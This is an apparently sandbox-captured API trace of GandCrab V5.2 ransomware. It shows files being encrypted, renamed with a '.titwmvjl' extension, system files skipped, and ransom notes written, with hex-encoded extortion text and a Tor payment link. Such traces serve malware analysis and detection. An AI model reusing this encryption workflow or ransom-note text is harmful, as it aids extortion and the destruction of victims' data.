dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0072.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.801] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0072.801] GetLastError () returned 0x0 [0072.801] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.801] CryptDestroyKey (hKey=0x5034b8) returned 1 [0072.801] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.801] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.802] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.802] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.802] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x5f, lpOverlapped=0x0) returned 1 [0072.809] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.809] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x5f, lpOverlapped=0x0) returned 1 [0072.811] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.812] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0072.814] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.818] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.818] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.818] CloseHandle (hObject=0x2cc) returned 1 [0072.819] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.titwmvjl"), dwFlags=0x1) returned 1 [0072.820] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.821] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.821] lstrcmpW (lpString1="Templates.LNK", lpString2=".") returned 1 [0072.821] lstrcmpW (lpString1="Templates.LNK", lpString2="..") returned 1 [0072.821] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Templates.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" [0072.821] lstrlenW (lpString=".titwmvjl") returned 9 [0072.821] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0072.821] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.821] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.titwmvjl") returned 84 [0072.821] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0072.821] lstrlenW (lpString=".LNK") returned 4 [0072.821] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.821] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".LNK ") returned 5 [0072.821] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.822] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.822] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.822] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.822] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt" [0072.822] lstrlenW (lpString=".titwmvjl") returned 9 [0072.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt") returned 82 [0072.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.822] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0072.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt") returned 82 [0072.822] lstrlenW (lpString=".txt") returned 4 [0072.822] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.822] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.822] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.822] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt") returned 82 [0072.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\TITWMVJL-DECRYPT.txt") returned 82 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.823] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.823] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.823] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0072.824] CloseHandle (hObject=0x2c4) returned 1 [0072.824] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.824] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.824] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt" [0072.824] lstrlenW (lpString=".titwmvjl") returned 9 [0072.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt") returned 75 [0072.824] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.824] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0072.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt") returned 75 [0072.824] lstrlenW (lpString=".txt") returned 4 [0072.824] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.824] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.824] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.824] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.825] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt") returned 75 [0072.825] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\TITWMVJL-DECRYPT.txt") returned 75 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.825] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.825] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.825] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.825] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0072.826] CloseHandle (hObject=0x2bc) returned 1 [0072.826] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.826] lstrcmpW (lpString1="OneNote", lpString2=".") returned 1 [0072.826] lstrcmpW (lpString1="OneNote", lpString2="..") returned 1 [0072.826] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="OneNote" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote" [0072.826] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\" [0072.826] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.826] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.826] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.827] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.827] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.827] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.827] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.827] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\\\TITWMVJL-DECRYPT.txt") returned 77 [0072.827] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.828] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\